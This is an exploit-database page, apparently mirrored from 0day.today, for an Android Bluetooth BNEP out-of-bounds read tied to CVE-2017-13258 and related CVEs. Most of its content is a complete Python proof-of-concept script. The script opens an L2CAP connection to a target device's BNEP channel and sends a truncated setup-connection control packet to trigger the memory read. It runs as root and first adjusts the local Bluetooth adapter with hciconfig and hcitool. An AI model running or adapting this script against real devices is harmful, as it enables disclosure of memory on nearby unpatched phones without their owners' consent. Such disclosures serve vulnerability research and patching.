Lucene search

K

Android Bluetooth - BNEP BNEP_SETUP_CONNECTION_REQUEST_MSG Out-of-Bounds Read Exploit

πŸ—“οΈΒ 23 Mar 2018Β 00:00:00Reported byΒ QuarksLabTypeΒ 
zdt
Β zdt
πŸ”—Β 0day.todayπŸ‘Β 50Β Views

Android Bluetooth BNEP_SETUP_CONNECTION_REQUEST_MSG Out-of-Bounds Read Exploi

Show more
Related
Code
ReporterTitlePublishedViews
Family
Packet Storm
Android Bluetooth BNEP BNEP_SETUP_CONNECTION_REQUEST_MSG Out-Of-Bounds Read
23 Mar 201800:00
–packetstorm
Packet Storm
Android Bluetooth BNEP bnep_data_ind() Remote Heap Disclosure
23 Mar 201800:00
–packetstorm
0day.today
Android Bluetooth - BNEP bnep_data_ind() Remote Heap Disclosure Exploit
23 Mar 201800:00
–zdt
Prion
Out-of-bounds
4 Apr 201817:29
–prion
Prion
Out-of-bounds
4 Apr 201817:29
–prion
Prion
Out-of-bounds
4 Apr 201817:29
–prion
Prion
Out-of-bounds
4 Apr 201817:29
–prion
CVE
CVE-2017-13258
4 Apr 201817:29
–cve
CVE
CVE-2017-13262
4 Apr 201817:29
–cve
CVE
CVE-2017-13260
4 Apr 201817:29
–cve
Rows per page
import os
import sys
import struct
 
import bluetooth
 
 
BNEP_PSM = 15
BNEP_FRAME_CONTROL = 0x01
 
# Control types (parsed by bnep_process_control_packet() in bnep_utils.cc)
BNEP_SETUP_CONNECTION_REQUEST_MSG = 0x01
 
 
def oob_read(src_bdaddr, dst):
 
    bnep = bluetooth.BluetoothSocket(bluetooth.L2CAP)
    bnep.settimeout(5)
    bnep.bind((src_bdaddr, 0))
    print 'Connecting to BNEP...'
    bnep.connect((dst, BNEP_PSM))
    bnep.settimeout(1)
    print "Triggering OOB read (you may need a debugger to verify that it's actually happening)..."
 
    # This crafted BNEP packet just contains the BNEP_FRAME_CONTROL frame type,
    # plus the BNEP_SETUP_CONNECTION_REQUEST_MSG control type.
    # It doesn't include the 'len' field, therefore it is read from out of bounds
    bnep.send(struct.pack('<BB', BNEP_FRAME_CONTROL, BNEP_SETUP_CONNECTION_REQUEST_MSG))
    try:
        data = bnep.recv(3)
    except bluetooth.btcommon.BluetoothError:
        data = ''
 
    if data:
        print '%r' % data
    else:
        print '[No data]'
 
    print 'Closing connection.'
    bnep.close()
 
 
def main(src_hci, dst):
    os.system('hciconfig %s sspmode 0' % (src_hci,))
    os.system('hcitool dc %s' % (dst,))
 
    oob_read(src_hci, dst)
 
 
if __name__ == '__main__':
    if len(sys.argv) < 3:
        print('Usage: python bnep02.py <src-bdaddr> <dst-bdaddr>')
    else:
        if os.getuid():
            print 'Error: This script must be run as root.'
        else:
            main(sys.argv[1], sys.argv[2])

#  0day.today [2018-04-11]  #

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. ContactΒ us for a demo andΒ discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
23 Mar 2018 00:00Current
0.3Low risk
Vulners AI Score0.3
EPSS0.161
50
.json
Report